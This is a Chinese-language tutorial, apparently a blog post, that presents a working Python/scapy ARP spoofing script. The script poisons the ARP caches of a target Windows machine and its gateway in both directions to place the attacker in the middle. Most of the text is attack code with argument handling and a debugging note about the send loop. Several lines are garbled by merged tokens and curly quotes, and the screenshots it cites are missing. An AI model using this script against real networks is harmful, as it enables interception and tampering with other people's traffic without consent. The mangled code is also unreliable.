1.系统环境:Ubuntu 16.04
Python版本:2.7
2.攻击机器:Ubuntu(192.16.0.14)
目标机器:Windows 7(192.168.0.9)
网关:(192.168.0.1)
3.首先使用下面命令安装scapy模块
pip install scapy
4.关于ARP欺骗的原理以及ARP包的格式请自行百度,在此不作过多描述
from scapy.all import *
importargparseimportsysdefarp_attack(interface,tip,gip):
local_mac=get_if_hwaddr(interface) #get_if_hwaddr是获取指定网卡的MAC地址
tmac=getmacbyip(tip) #getmacbyip是获取指定ip的MAC地址
gmac=getmacbyip(gip)
tpacket=Ether(src=local_mac,dst=tmac)/ARP(hwsrc=local_mac,psrc=gip,hwdst=tmac,pdst=tip,op=2) #
在ARP包前面加上以太网头部,src是源MAC,dst是目标MAC,ARP中的参数与ARP包格式有关,请自行百度
gpacket=Ether(src=local_mac,dst=gmac)/ARP(hwsrc=local_mac,psrc=tip,hwdst=gmac,pdst=gip,op=2)
while 1:
sendp(tpacket,iface=interface,inter=1) #sendp是在第二层发送数据包,inter参数代表每间隔inter指定的秒数发送一次数据包
print("sending: %s(MAC:%s) -> %s"%(gip,local_mac,tip))
sendp(gpacket,iface=interface,inter=1)print("sending: %s(MAC:%s) -> %s"%(tip,local_mac,gip))if __name__ == ‘__main__‘:
parser=argparse.ArgumentParser()
parser.add_argument(‘-i‘,help=‘select interface‘)
parser.add_argument(‘-t‘,help=‘target ip‘)
parser.add_argument(‘-g‘,help=‘gateway ip‘)
args=parser.parse_args()if args.i and args.t andargs.g:print("Use Ctrl+z to stop")
arp_attack(args.i,args.t,args.g)else:print("Please enter the correct parameters")
关于下面这一块的代码一开始我是写成图中所示的(当时只截了图,没有复制代码,抱歉):
while 1:
sendp(tpacket,iface=interface,inter=1) #sendp是在第二层发送数据包,inter参数代表每间隔inter指定的秒数发送一次数据包
print("sending: %s(MAC:%s) -> %s"%(gip,local_mac,tip))
sendp(gpacket,iface=interface,inter=1)print("sending: %s(MAC:%s) -> %s"%(tip,local_mac,gip))
loop参数代表循环发送数据包,但是脚本会一直停止在第一个数据包的发送处,不会发送第二个数据包,达不到双向欺骗的目的,所以作了修改。
说明:脚本要在root权限下运行,如果是普通用户权限,你会发现你的getmacbyip只能获取本地的MAC,而不能获取网关与目标主机的MAC,它会出现如下错误信息:
5.最后的结果如下图所示:
你可以看到目标主机中的网关的MAC地址已经是我的Ubuntu主机的MAC地址了。